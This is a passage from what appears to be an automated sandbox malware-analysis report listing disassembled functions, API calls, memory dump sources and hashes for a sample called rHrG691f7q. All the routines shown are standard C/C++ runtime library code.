                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31EE31A006119FDF26EF6AC890A7ABBA5AF44712F1045AED8078B255DB70A845CFC0
                                                                                                                                                                                                                                                                    Function 024E8F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 024E8F77
                                                                                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 024E8F90
                                                                                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 024E8F97
                                                                                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 024E8FB6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1467055271-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                                                    • Instruction ID: 6d3bb7015e6ed4c77b9c5ad709421cad8b50ac3aaf097d975831374fde9240d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E216872A042049FEF24DFA8CC05E6E77A6EF44352B10821FE903D3290E731E941CE92
                                                                                                                                                                                                                                                                    Function 024C5437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                    • Instruction ID: 2e95efde53d1a1d55f37b0c356b08edf9e84439c8fbec09670d2861229bdb023
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217175C04208AADF55EBADD840BDEB7F9AF08325F74402FE104B7240DB7899448A75
                                                                                                                                                                                                                                                                    Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EA95E0BC), ref: 00428DE8
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EA95E0BC), ref: 00428E61
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                    • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                                                    Function 024E9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E904F
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024E905D
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024E9076
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E90C8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                    • Instruction ID: 2714f903b9eb1b41c4c4113ca7c86f4d5b0917adb0489019d0e1b013ca9af12c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5201D4322097216FBE3527B5AC88AA72745EB05777B30033FE522553E1EF1288554D89
                                                                                                                                                                                                                                                                    Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                    • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                                                    Function 024C4FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024C4FCA
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 024C4FE1
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 024C4FEA
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 024C501B
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024C5031
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024C504F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                    • Instruction ID: 72d8678bbb20361dd4b4f23bfdc364d9d93a667f968aed83d728c298ff0ca221
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7911A0399002189BCB65EB69D900AAE77B2BF04324F74011FE416BB390DF74AA058FD4
                                                                                                                                                                                                                                                                    Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                    • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                                                    Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                    • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                                                    Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                    • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                    Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                    Function 024CC3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024CC401
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 024CC418
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 024CC421
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 024CC452
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024CC468
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024CC486
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                    • Instruction ID: 1ee5f96832ed2fae7e2ae468e4368d9f71a519fe0dd3b6c4ce8637cae64c223a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11CE79900228ABCF55EBA9D884AEE7772AF40714F34411FE815AB2A0DF748A01CF94
                                                                                                                                                                                                                                                                    Function 024C4E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024C4E8C
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 024C4EA3
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 024C4EAC
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 024C4EDD
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024C4EF3
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024C4F11
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction ID: d9c20067d2a9bb7bfa1c5afec29493e2bad5dbcd634e420e7a3b0ee830e3f39b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9911AC799002289BCF55EBA9E910AAE77B2AF44324F34011FE811A72A0DF749A01CF95
                                                                                                                                                                                                                                                                    Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID: fJ@
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                                                    • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                    • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                                                    Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                    • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                    • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
